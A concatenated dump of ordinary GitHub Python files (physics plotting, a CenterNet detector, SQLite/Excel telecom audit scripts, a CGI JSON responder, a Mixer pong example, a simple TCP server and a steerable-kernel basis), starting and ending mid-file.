\n 
tt=plt.linspace(1e-20,1.2,4000)\n plt.figure()\n plt.title('ideal gas')\n plt.ylabel('f')\n plt.xlabel('n') \n #plt.plot(x2,SW.fid(Tlist[100],x2),color='#f36118')\n #plt.plot(tt,SW.fid(tt,nR[100]))\n plt.show()\n\n\ndef gfe5():\n x2=plt.linspace(1e-20,.2,4000)\n lazy=100\n mu=SW.numH_dftot_dn(Tlist[lazy],x2)\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[lazy])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[lazy],x2)-mu*x2,color='#f36118')\n plt.plot(x2,x2-x2,'c')\n plt.plot(nL[lazy],0,'ko')\n plt.plot(nR[lazy],0,'ko')\n plt.show()\n\n\ndef liq_vap_Tvsn():\n plt.figure()\n plt.plot(nL,Tlist,color='#f36118',linewidth=2)\n plt.plot(nR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(nR)+.05)\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n #plt.savefig('figs/liqVapCo_Tvsff.pdf')\n\n\n '''plt.figure()\n plt.plot(nL,Tlist,color='#f36118',linewidth=2)\n plt.plot(nR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(nR)+.05)\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')'''\n\n plt.show()\n\n\ndef cotangent_t100():\n x2=plt.linspace(1e-20,.2,4000)\n plt.figure()\n plt.title('Helmholtz energy per volume VS ff @ T=%0.4f'%Tlist[100])\n plt.ylabel('Helmholtz free energy per volume')\n plt.xlabel('filling fraction')\n plt.plot(x2,SW.ftot(Tlist[100],x2),color='#f36118',linewidth=3)\n plt.plot(x2, SW.numH_dftot_dn(Tlist[100],nR[100])*(x2-nR[100])+SW.ftot(Tlist[100],nR[100]),color='#00c0c0',linewidth=2)\n #plt.plot(nL[100],SW.ftot(Tlist[100],nL[100]),'ko')\n #plt.plot(nR[100],SW.ftot(Tlist[100],nR[100]),'ko')\n plt.plot(nL[100],SW.ftot(Tlist[100],nL[100]),'ko')\n plt.plot(nR[100],SW.ftot(Tlist[100],nR[100]),'ko')\n #plt.savefig('figs/hfe_cotangent.pdf')\n plt.show()\n\n#ideal()\n#liq_vap_co_pvsT()\n#liq_vap_Tvsff()\n#cotangent_t0()\n#gfe()\n#gfe2()\n#gfe3()\ngfe4()\n#liq_vap_Tvsn()\n#cotangent_t100()\n \n","repo_name":"droundy/deft","sub_path":"papers/thesis-scheirer/final/poster_plots.py","file_name":"poster_plots.py","file_ext":"py","file_size_in_byte":9325,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"92"} +{"seq_id":"74341442218","text":"from typing import Dict, Tuple\r\n\r\nimport torch\r\nfrom torch import nn\r\n\r\nfrom .backbone import resnet18\r\nfrom .losses import GaussianFocalLoss, L1Loss\r\nfrom .modules import CenterNetHead, CTResNetNeck\r\nfrom .utils import (\r\n batched_nms,\r\n gaussian_radius,\r\n gen_gaussian_target,\r\n get_local_maximum,\r\n get_topk_from_heatmap,\r\n transpose_and_gather_feat,\r\n)\r\n\r\n\r\nclass CenterNet(nn.Module):\r\n def __init__(self, num_classes: int = 4) -> None:\r\n super().__init__()\r\n self.num_classes = num_classes\r\n self.backbone = resnet18(pretrained=True)\r\n self.neck = CTResNetNeck(\r\n in_channels=512,\r\n num_deconv_filters=(256, 128, 64),\r\n num_deconv_kernels=(4, 4, 4),\r\n )\r\n self.bbox_head = CenterNetHead(\r\n in_channels=64, feat_channels=64, num_classes=num_classes\r\n )\r\n\r\n self.loss_center_haetmap = GaussianFocalLoss(loss_weight=1.0)\r\n self.loss_wh = L1Loss(loss_weight=0.1)\r\n self.loss_offset = L1Loss(loss_weight=1.0)\r\n\r\n def forward(self, x: torch.Tensor) -> Dict[str, torch.Tensor]:\r\n x = self.backbone(x)\r\n x = self.neck(x)\r\n feature = self.bbox_head(x)\r\n\r\n return feature\r\n\r\n def loss(\r\n self,\r\n 
feature: Dict[str, torch.Tensor],\r\n gt_bboxes: torch.Tensor,\r\n gt_labels: torch.Tensor,\r\n imgs_shape: torch.Tensor,\r\n ) -> Dict[str, torch.Tensor]:\r\n target = self.get_targets(\r\n gt_bboxes, gt_labels, feature[\"heatmap\"].shape, imgs_shape\r\n )\r\n\r\n loss_center_heatmap = self.loss_center_haetmap(\r\n feature[\"heatmap\"], target[\"center_heatmap_target\"]\r\n ).sum(dim=(3, 2, 1))\r\n loss_wh = self.loss_wh(feature[\"wh\"], target[\"wh_target\"]).sum(dim=(3, 2, 1))\r\n loss_offset = self.loss_offset(\r\n feature[\"offset\"],\r\n target[\"offset_target\"],\r\n ).sum(dim=(3, 2, 1))\r\n\r\n return {\r\n \"loss_center_heatmap\": loss_center_heatmap.mean(),\r\n \"loss_wh\": loss_wh.mean(),\r\n \"loss_offset\": loss_offset.mean(),\r\n }\r\n\r\n def get_targets(\r\n self, gt_bboxes, gt_labels, feat_shape, imgs_shape\r\n ) -> Dict[str, torch.Tensor]:\r\n \"\"\"Compute regression and classification targets in multiple images.\r\n Args:\r\n gt_bboxes (list[Tensor]): Ground truth bboxes for each image with\r\n shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format.\r\n gt_labels (list[Tensor]): class indices corresponding to each box.\r\n feat_shape (list[int]): feature map shape with value [B, _, H, W]\r\n imgs_shape (list[int]): image shape in [h, w] format.\r\n Returns:\r\n tuple[dict,float]: The float value is mean avg_factor, the dict has\r\n components below:\r\n - center_heatmap_target (Tensor): targets of center heatmap, \\\r\n shape (B, num_classes, H, W).\r\n - wh_target (Tensor): targets of wh predict, shape \\\r\n (B, 2, H, W).\r\n - offset_target (Tensor): targets of offset predict, shape \\\r\n (B, 2, H, W).\r\n - wh_offset_target_weight (Tensor): weights of wh and offset \\\r\n predict, shape (B, 2, H, W).\r\n \"\"\"\r\n bs, _, feat_h, feat_w = feat_shape\r\n\r\n height_ratio = feat_h / imgs_shape[:, 1]\r\n width_ratio = feat_w / imgs_shape[:, 2]\r\n\r\n center_heatmap_target = gt_bboxes[-1].new_zeros(\r\n [bs, self.num_classes, feat_h, feat_w]\r\n )\r\n wh_target = gt_bboxes[:, -1].new_zeros([bs, 2, feat_h, feat_w])\r\n offset_target = gt_bboxes[:, -1].new_zeros([bs, 2, feat_h, feat_w])\r\n wh_offset_target_weight = gt_bboxes[:, -1].new_zeros([bs, 2, feat_h, feat_w])\r\n\r\n center_x = (gt_bboxes[:, 0] + gt_bboxes[:, 2]) * width_ratio / 2\r\n center_y = (gt_bboxes[:, 1] + gt_bboxes[:, 3]) * height_ratio / 2\r\n gt_centers = torch.cat([center_x.unsqueeze(1), center_y.unsqueeze(1)], dim=1)\r\n\r\n for j, ct in enumerate(gt_centers):\r\n ctx_int, cty_int = ct.int()\r\n ctx, cty = ct\r\n scale_box_h = (gt_bboxes[j, 3] - gt_bboxes[j, 1]) * height_ratio[j]\r\n scale_box_w = (gt_bboxes[j, 2] - gt_bboxes[j, 0]) * width_ratio[j]\r\n radius = gaussian_radius([scale_box_h, scale_box_w], min_overlap=0.3)\r\n radius = max(0, int(radius))\r\n ind = gt_labels[j] - 1\r\n gen_gaussian_target(\r\n center_heatmap_target[j, ind, :, :], [ctx_int, cty_int], radius\r\n )\r\n\r\n wh_target[j, 0, cty_int, ctx_int] = scale_box_w\r\n wh_target[j, 1, cty_int, ctx_int] = scale_box_h\r\n\r\n offset_target[j, 0, cty_int, ctx_int] = ctx - ctx_int\r\n offset_target[j, 1, cty_int, ctx_int] = cty - cty_int\r\n\r\n wh_offset_target_weight[j, :, cty_int, ctx_int] = 1\r\n\r\n return {\r\n \"center_heatmap_target\": center_heatmap_target,\r\n \"wh_target\": wh_target,\r\n \"offset_target\": offset_target,\r\n }\r\n\r\n def get_bboxes(\r\n self,\r\n center_heatmap_preds,\r\n wh_preds,\r\n offset_preds,\r\n with_nms=False,\r\n ) -> Tuple[torch.Tensor]:\r\n \"\"\"Transform network output for a batch into bbox 
predictions.\r\n\r\n Args:\r\n center_heatmap_preds (list[Tensor]): Center predict heatmaps for\r\n all levels with shape (B, num_classes, H, W).\r\n wh_preds (list[Tensor]): WH predicts for all levels with\r\n shape (B, 2, H, W).\r\n offset_preds (list[Tensor]): Offset predicts for all levels\r\n with shape (B, 2, H, W).\r\n with_nms (bool): If True, do nms before return boxes.\r\n Default: False.\r\n\r\n Returns:\r\n list[tuple[Tensor, Tensor]]: Each item in result_list is 2-tuple.\r\n The first item is an (n, 5) tensor, where 5 represent\r\n (tl_x, tl_y, br_x, br_y, score) and the score between 0 and 1.\r\n The shape of the second tensor in the tuple is (n,), and\r\n each element represents the class label of the corresponding\r\n box.\r\n \"\"\"\r\n assert len(center_heatmap_preds) == len(wh_preds) == len(offset_preds)\r\n\r\n bboxes, labels = [], []\r\n for img_id in range(len(center_heatmap_preds)):\r\n bbox, label = self._get_bboxes_single(\r\n center_heatmap_preds[img_id : img_id + 1],\r\n wh_preds[img_id : img_id + 1],\r\n offset_preds[img_id : img_id + 1],\r\n with_nms=with_nms,\r\n )\r\n bboxes.append(bbox)\r\n labels.append(label)\r\n\r\n return torch.stack(bboxes), torch.stack(labels)\r\n\r\n def _get_bboxes_single(\r\n self,\r\n center_heatmap_pred,\r\n wh_pred,\r\n offset_pred,\r\n with_nms=True,\r\n ) -> Tuple[torch.Tensor]:\r\n \"\"\"Transform outputs of a single image into bbox results.\r\n\r\n Args:\r\n center_heatmap_pred (Tensor): Center heatmap for current level with\r\n shape (1, num_classes, H, W).\r\n wh_pred (Tensor): WH heatmap for current level with shape\r\n (1, num_classes, H, W).\r\n offset_pred (Tensor): Offset for current level with shape\r\n (1, corner_offset_channels, H, W).\r\n img_meta (dict): Meta information of current image, e.g.,\r\n image size, scaling factor, etc.\r\n with_nms (bool): If True, do nms before return boxes.\r\n Default: True.\r\n\r\n Returns:\r\n tuple[Tensor, Tensor]: The first item is an (n, 5) tensor, where\r\n 5 represent (tl_x, tl_y, br_x, br_y, score) and the score\r\n between 0 and 1. The shape of the second tensor in the tuple\r\n is (n,), and each element represents the class label of the\r\n corresponding box.\r\n \"\"\"\r\n batch_det_bboxes, batch_labels = self.decode_heatmap(\r\n center_heatmap_pred,\r\n wh_pred,\r\n offset_pred,\r\n )\r\n\r\n det_bboxes = batch_det_bboxes.view([-1, 5])\r\n det_labels = batch_labels.view(-1)\r\n\r\n # batch_border = det_bboxes.new_tensor(img_meta[\"border\"])[..., [2, 0, 2, 0]]\r\n # det_bboxes[..., :4] -= batch_border\r\n\r\n if with_nms:\r\n det_bboxes, det_labels = self._bboxes_nms(det_bboxes, det_labels)\r\n\r\n return det_bboxes, det_labels\r\n\r\n def decode_heatmap(\r\n self,\r\n center_heatmap_pred: torch.Tensor,\r\n wh_pred: torch.Tensor,\r\n offset_pred: torch.Tensor,\r\n img_shape: Tuple[int] = (512, 512),\r\n k: int = 100,\r\n kernel: int = 3,\r\n ) -> Tuple[torch.Tensor]:\r\n \"\"\"Transform outputs into detections raw bbox prediction.\r\n\r\n Args:\r\n center_heatmap_pred (Tensor): center predict heatmap,\r\n shape (B, num_classes, H, W).\r\n wh_pred (Tensor): wh predict, shape (B, 2, H, W).\r\n offset_pred (Tensor): offset predict, shape (B, 2, H, W).\r\n img_shape (Tuple[int]): image shape in [h, w] format.\r\n k (int): Get top k center keypoints from heatmap. 
Default 100.\r\n kernel (int): Max pooling kernel for extract local maximum pixels.\r\n Default 3.\r\n\r\n Returns:\r\n tuple[torch.Tensor]: Decoded output of CenterNetHead, containing\r\n the following Tensors:\r\n\r\n - batch_bboxes (Tensor): Coords of each box with shape (B, k, 5)\r\n - batch_topk_labels (Tensor): Categories of each box with \\\r\n shape (B, k)\r\n \"\"\"\r\n height, width = center_heatmap_pred.shape[2:]\r\n inp_h, inp_w = img_shape\r\n\r\n center_heatmap_pred = get_local_maximum(center_heatmap_pred, kernel=kernel)\r\n\r\n *batch_dets, topk_ys, topk_xs = get_topk_from_heatmap(center_heatmap_pred, k=k)\r\n batch_scores, batch_index, batch_topk_labels = batch_dets\r\n\r\n wh = transpose_and_gather_feat(wh_pred, batch_index)\r\n offset = transpose_and_gather_feat(offset_pred, batch_index)\r\n topk_xs = topk_xs + offset[..., 0]\r\n topk_ys = topk_ys + offset[..., 1]\r\n tl_x = (topk_xs - wh[..., 0] / 2) * (inp_w / width)\r\n tl_y = (topk_ys - wh[..., 1] / 2) * (inp_h / height)\r\n br_x = (topk_xs + wh[..., 0] / 2) * (inp_w / width)\r\n br_y = (topk_ys + wh[..., 1] / 2) * (inp_h / height)\r\n\r\n batch_bboxes = torch.stack([tl_x, tl_y, br_x, br_y], dim=2)\r\n batch_bboxes = torch.cat((batch_bboxes, batch_scores[..., None]), dim=-1)\r\n\r\n return batch_bboxes, batch_topk_labels + 1\r\n\r\n def _bboxes_nms(self, bboxes, labels, max_num: int = 100) -> Tuple[torch.Tensor]:\r\n if labels.numel() > 0:\r\n bboxes, keep = batched_nms(\r\n bboxes[:, :4], bboxes[:, -1].contiguous(), labels\r\n )\r\n if max_num > 0:\r\n bboxes = bboxes[:max_num]\r\n labels = labels[keep][:max_num]\r\n\r\n return bboxes, labels\r\n","repo_name":"a5chin/centernet","sub_path":"centernet/centernet.py","file_name":"centernet.py","file_ext":"py","file_size_in_byte":11241,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"39165832100","text":"from pathlib import Path\nimport pandas as pd\nimport sqlite3\nfrom pyexcelerate import Workbook\nfrom datetime import date\n\n\ndef sqlcopybl(dbs, dbt):\n db1 = Path('C:/sqlite/2020' + str(dbs) + '_sqlite.db')\n db2 = Path('C:/sqlite/2020' + str(dbt) + '_sqlite.db')\n conn = sqlite3.connect(db1)\n c = conn.cursor()\n try:\n c.execute(\"ATTACH DATABASE '\" + str(db2) + \"' AS db_2\")\n c.execute(\"DROP TABLE IF EXISTS db_2.baseline\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_UMTS\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_LTE\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_GSM\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_700FU\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_LTemp\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_LTempF\")\n c.execute(\"CREATE TABLE db_2.baseline AS SELECT * FROM baseline\")\n c.execute(\"CREATE TABLE db_2.Baseline_UMTS AS SELECT * FROM Baseline_UMTS\")\n c.execute(\"CREATE TABLE db_2.Baseline_LTE AS SELECT * FROM Baseline_LTE\")\n c.execute(\"CREATE TABLE db_2.Baseline_GSM AS SELECT * FROM Baseline_GSM\")\n c.execute(\"CREATE TABLE db_2.Baseline_700FU AS SELECT * FROM Baseline_700FU\")\n c.execute(\"CREATE TABLE db_2.Baseline_LTemp AS SELECT * FROM Baseline_LTemp\")\n c.execute(\"CREATE TABLE db_2.Baseline_LTempF AS SELECT * FROM Baseline_LTempF\")\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n return\n\n\ndef sqlcsvimport(datsq, tipo, tec):\n datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n conn = sqlite3.connect(datab)\n c = conn.cursor()\n 
c.execute(\"DROP TABLE IF EXISTS \" + tipo)\n try: # import baseline csv to sqlite by 10000 rows batch\n xlspath = Path('C:/xml/baseline/') # baseline csv directory\n base = pd.read_csv(xlspath / Path('bl' + tec + '.csv'), encoding='latin-1')\n base.to_sql(tipo, conn, if_exists='append', index=False, chunksize=10000)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n return\n\n\ndef sqlcsvimp031(datsq, tipo):\n datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n conn = sqlite3.connect(datab)\n c = conn.cursor()\n c.execute(\"DROP TABLE IF EXISTS \" + tipo)\n try: # import report LTE031 csv to sqlite by 10000 rows batch\n xlspath = Path('C:/xml/baseline/031/') # 031 csv directory\n for baself in xlspath.glob('*.csv'): # file iteration inside directory\n tempo = pd.read_csv(baself, sep=';', chunksize=50000) # csv read in 50K rows blocks\n for chunk in tempo:\n chunk.to_sql(tipo, conn, if_exists='append', index=False, chunksize=10000)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n return\n\n\ndef sqltabexport(datsq, tabs1, filenam):\n datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n today = date.today()\n xls_file = filenam + '_' + today.strftime(\"%y%m%d\") + \".xlsx\"\n xls_path = datab.parent / xls_file # xls file path-name\n conn = sqlite3.connect(datab) # database connection\n c = conn.cursor()\n wb = Workbook()\n for i in tabs1:\n try:\n df = pd.read_sql_query(\"select * from \" + i + \";\", conn) # pandas dataframe from sqlite\n data = [df.columns.tolist()] + df.values.tolist() # dataframe to list to pyexcelerate save\n wb.new_sheet(i, data=data)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n wb.save(xls_path)\n return\n\n\ndef amleprsqlconcat(tabs1, conn):\n # datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n # today = date.today()\n # xls_file = filenam + '_' + today.strftime(\"%y%m%d\") + \".xlsx\"\n # xls_path = datab.parent / xls_file # xls file path-name\n # conn = sqlite3.connect(datab) # database connection\n # c = conn.cursor()\n # wb = Workbook()\n dfconcat = pd.DataFrame()\n for i in tabs1:\n try:\n df = pd.read_sql_query(\"select * from \" + i + \";\", conn) # pandas dataframe from sqlite\n dfconcat = dfconcat.append(df, ignore_index=True)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n data = [dfconcat.columns.tolist()] + dfconcat.values.tolist() # dataframe to list to pyexcelerate save\n # wb.new_sheet(filenam, data=data)\n # c.close()\n # conn.close()\n # # wb.save(xls_path)\n return data\n\n\ndef concat(tec):\n xlspath = Path('C:/xml/baseline/' + tec) # tec baselines from RF page directory\n conca = pd.DataFrame()\n for baself in xlspath.glob('*.xls'): # file iteration inside directory\n tempo = pd.read_html(str(baself))\n conca = conca.append(tempo)\n conca.to_csv(xlspath.parent / Path('bl' + tec + '.csv'))\n return\n\n\ndateini = 1217\ndatesq = 1218\n\n# stage1\nconcat('UMTS')\nconcat('LTE')\nconcat('Sitios')\nconcat('GSM')\nsqlcsvimport(datesq, 'baseline', 'Sitios')\nsqlcsvimport(datesq, 'Baseline_LTE', 'LTE')\nsqlcsvimport(datesq, 'Baseline_UMTS', 'UMTS')\nsqlcsvimport(datesq, 'Baseline_GSM', 'GSM')\n#\n# stage2\n# sqlcsvimp031(datesq, 'RSLTE031')\n# sqlcopybl(dateini, datesq)\n# stage3\n# proc = [3]\n# 
proc = [1, 2, 3, 4]\n# for iter1 in proc:\n# if iter1 == 1:\n# tabs = ['LNREL_DISC_700', 'LNREL_PART_NOCOLOC', 'LNREL_PART_NOCOSCTR', 'LNREL_PART_NOCOSITE',\n# 'LNREL_PART_UNDFND', 'LNMME_Miss', 'PCI_DistF1', 'RSI_DistF1', 'LTE_Param', 'WCEL_PARAM1',\n# 'BTS_PARAM']\n# filen = 'Mob_Audit'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 2:\n# tabs = ['T031_PAR_LNRELS']\n# filen = '031_LNREL'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 3:\n# tabs = ['IRFIM_Miss', 'AMLEPR_MISS', 'LNREL_COS_MISS', 'ADJL_AUD9560', 'ADJL_AUD9560G', 'ADJL_AUD626', 'ADJL_AUD626G',\n# 'ADJL_AUD651', 'ADJL_AUD651G', 'ADJL_AUD3075', 'ADJL_AUD3075G', 'ADJL_AUD3225', 'ADJL_AUD3225G']\n# filen = 'IRFIM_ADJL_Missing'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 4:\n# filet = 'LTE2051_1841_Disc'\n# datab = Path('C:/sqlite/2020' + str(datesq) + '_sqlite.db')\n# today = date.today()\n# xls_file = filet + '_' + today.strftime(\"%y%m%d\") + \".xlsx\"\n# xls_path = datab.parent / xls_file # xls file path-name\n# conn = sqlite3.connect(datab) # database connection\n# c = conn.cursor()\n# wb = Workbook()\n# tabs = ['IRFIM_626AUD', 'IRFIM_651AUD', 'IRFIM_9560AUD', 'IRFIM32253075AUD', 'IRFIM30753225AUD',\n# 'IRFIM_3075AUD', 'IRFIM_3225AUD']\n# filen = 'IRFIM_DISC'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['AMLEPR_3075_3225', 'AMLEPR_3075_651', 'AMLEPR_3075_626', 'AMLEPR_3075_9560', 'AMLEPR_3225_3075',\n# 'AMLEPR_3225_651', 'AMLEPR_3225_626', 'AMLEPR_3225_9560', 'AMLEPR_651_3075', 'AMLEPR_651_3225',\n# 'AMLEPR_651_626', 'AMLEPR_651_9560', 'AMLEPR_626_3075', 'AMLEPR_626_3225', ' AMLEPR_626_651',\n# 'AMLEPR_626_9560', 'AMLEPR_9560_3075', 'AMLEPR_9560_3225', 'AMLEPR_9560_651', 'AMLEPR_9560_626']\n# filen = 'AMLEPR_DISC'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['LNCEL_IDCONGEN_15_20', 'LNCEL_IDCONGEN_10', 'LNCEL_IDCONGEN_5'] # next audit\n# filen = 'LNCEL_IDCONGEN'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['LNCEL_AUD1841_15_20', 'LNCEL_AUD1841_10', 'LNCEL_AUD1841_5'] # next audit\n# filen = 'LNCEL_2051_1841'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['LNBTS_AUD2051']\n# filen = 'WBTS_DISC'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# c.close()\n# conn.close()\n# wb.save(xls_path)\n# elif iter1 == 5:\n# tabs = ['T031_PAR_LNRELT']\n# filen = '031_LNREL'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 6:\n# tabs = ['LNCEL_Full', 'IRFIM_ref']\n# filen = 'IRFIM'\n# sqltabexport(datesq, tabs, filen)\nprint('ok')\n\n\n\n","repo_name":"grodriguece/NPO","sub_path":"700/umtsbljoin_201218.py","file_name":"umtsbljoin_201218.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11393535214","text":"import demjson\ndata =\t{\"data\":\n [{\n \"error_no\":\"0\",\n \"data\":\n [{\"rowcount\":123,\n \"title\":\"测试1\",\n \"pushTime\":\"20121202\",\n \"pushStatus\":\"0\",\n \"pushOperator\":\"1234\",\n \"pushNum\":\"12\",\n \"perPushNum\":\"12121\",\n \"perPushOpen\":\"12\"},\n {\n \"title\":\"测试2\",\n \"pushTime\":\"20121202\",\n \"pushStatus\":\"1\",\n \"pushOperator\":\"1234\",\n \"pushNum\":\"12\",\n \"perPushNum\":\"12121\",\n \"perPushOpen\":\"12\"},\n {\n \"title\":\"测试3\",\n \"pushTime\":\"20121202\",\n \"pushStatus\":\"1\",\n \"pushOperator\":\"1234\",\n \"pushNum\":\"12\",\n \"perPushNum\":\"12121\",\n 
\"perPushOpen\":\"12\"}]\n }]\n}\nerrorCode = {\"errorCode\":\"0\"}\njson = demjson.encode(data)\nprint('Accept: application/json, text/javascript, */*; q=0.01')\nprint('Content-Type: application/json')\nprint('Access-Control-Allow-Credentials: true')\nprint('Access-Control-Allow-Headers: accessToken,Content-Type')\nprint('Access-Control-Allow-Origin: http://localhost:63342' + '\\n')\nprint(json)","repo_name":"HanlaoTwo/SNOF","sub_path":"cgi-bin/getDatas.py","file_name":"getDatas.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"32386392057","text":"\"\"\"\nWe've modified our base pong game to run an interactive where the viewers\ncontrol the paddle on the right. We handle all the control setup within our\nclient, but you can also design your controls in the Interactive Studio!\n\nYou should provide an OAuth token to connect to interactive on the comment line.\nYou can get this token by going to https://interactive.mixer.com/request\n\nPress 'q' to quit.\n\nRun this with::\n\n python -m examples.1_viewer_controlled.pong <ThatLongOAuthToken>\n\"\"\"\n\nfrom interactive_python import State, Button, keycode\nfrom sys import argv\n\nfrom ..engine import BaseGame, run\n\n\nclass Game(BaseGame):\n def __init__(self):\n super().__init__()\n self._player_1 = self._create_paddle(x=0, height=self._screen_height//6)\n self._player_2 = self._create_paddle(x=self._screen_width-1,\n height=self._screen_height//4)\n self._interactive = None\n\n async def setup(self):\n \"\"\"\n Called automatically by our game engine to boot the game. We'll create\n an interactive connection here! I've hard-coded a blank project to use.\n \"\"\"\n try:\n interactive = await State.connect(authorization=\"Bearer \" + argv[1],\n project_version_id=42489,\n project_sharecode='rheo1hre')\n except Exception as e:\n print(\"Error connecting to interactive\", e)\n return\n\n self._interactive = interactive\n interactive.on('error', lambda e: self.fatal_error(e))\n\n interactive.pump_async()\n await self._setup_controls()\n\n async def _setup_controls(self):\n \"\"\"\n All the control setup! 
Alternately, you can design the controls in\n the Interactive Studio, but we'll do them programmatically\n for demonstration purposes.\n \"\"\"\n up = Button(\n control_id='up',\n text='Up',\n keycode=keycode.up,\n position=[\n {'size': 'large', 'width': 5, 'height': 5, 'x': 0, 'y': 0},\n ],\n )\n\n up.on('mousedown', lambda call: self._player_2.move(-1))\n\n down = Button(\n control_id='down',\n text='Down',\n keycode=keycode.down,\n position=[\n {'size': 'large', 'width': 5, 'height': 5, 'x': 0, 'y': 6},\n ],\n )\n\n down.on('mousedown', lambda call: self._player_2.move(1))\n\n await self._interactive.scenes['default'].create_controls(up, down)\n await self._interactive.set_ready()\n\n def update(self, pressed_key=None):\n if pressed_key == ord('s'):\n self._player_1.move(1)\n elif pressed_key == ord('w'):\n self._player_1.move(-1)\n\n self._ball.step(self._player_1, self._player_2)\n\n\nrun(Game())\n","repo_name":"mixer/interactive-python","sub_path":"examples/1_viewer_controlled/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"92"} +{"seq_id":"72907619181","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport socket, time\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind(('', 8888))\nserver_socket.listen(5)\n\nwhile True:\n (client_socket, client_address) = server_socket.accept()\n data = client_socket.recv(4096)\n datetime = time.asctime() + '\\n'\n client_socket.send('Hello ' + data)\n client_socket.send('My time is ' + datetime)\n client_socket.close()\n","repo_name":"JackDrogon/CodingEveryday","sub_path":"archive/old_coding_everyday_20160408/week19/day74/networking/hello-server.py","file_name":"hello-server.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"32005073622","text":"import numpy as np\nfrom abc import ABC, abstractmethod\nfrom typing import List, Union, Tuple, Callable, Dict\n\nfrom .basis import KernelBasis, EmptyBasisException\nfrom .steerable_basis import SteerableKernelBasis\nfrom .spaces import PointRn\n\n__all__ = [\n 'GaussianRadialProfile',\n 'SphericalShellsBasis'\n]\n\ndef cart2pol(points):\n # computes the polar coordinates\n \n cumsum = np.sqrt(np.cumsum(points[::-1, :] ** 2, axis=0)[:0:-1, :])\n \n radii = cumsum[0, :]\n \n angles = np.arccos(points[:-1, :] / cumsum)\n \n mask = points[-1, :] < 0\n angles[-1, mask] = 2 * np.pi - angles[-1, mask]\n \n # the angle at the origin is not well defined\n angles[:, radii.reshape(-1) < 1e-9] = np.nan\n \n return radii, angles\n\n\ndef pol2cart(radii, angles):\n assert len(radii.shape) == 2\n assert len(angles.shape) == 2\n assert radii.shape[0] == 1\n assert angles.shape[0] > 0\n assert radii.shape[1] == angles.shape[1]\n \n points = np.empty((angles.shape[0] + 1, angles.shape[1]))\n \n mask = (radii > 1e-9).reshape(-1)\n points[:, ~mask] = 0.\n \n non_origin_count = mask.sum()\n cos = np.empty((angles.shape[0] + 1, non_origin_count))\n sin = np.empty((angles.shape[0] + 1, non_origin_count))\n \n cos[:-1, :] = np.cos(angles[:, mask])\n cos[-1, :] = 1.\n \n sin[1:, :] = np.sin(angles[:, mask])\n sin[0, :] = 1.\n sin = np.cumprod(sin, axis=0)\n \n points[:, mask] = cos * sin * radii[:, mask]\n \n return points\n\n\nclass GaussianRadialProfile(KernelBasis):\n \n def __init__(self, radii: List[float], sigma: Union[List[float], float]):\n r\"\"\"\n\n Basis for 
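hello-server.py above is Python 2 code: on Python 3, `recv()` returns `bytes` and `send()` requires `bytes`, so `'Hello ' + data` raises a TypeError. A sketch of the same server that runs on Python 3, using `sendall()` to avoid short writes:

```python
import socket, time

server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_socket.bind(('', 8888))
server_socket.listen(5)

while True:
    client_socket, client_address = server_socket.accept()
    data = client_socket.recv(4096)                      # bytes on Python 3
    client_socket.sendall(b'Hello ' + data)              # concatenate bytes with bytes
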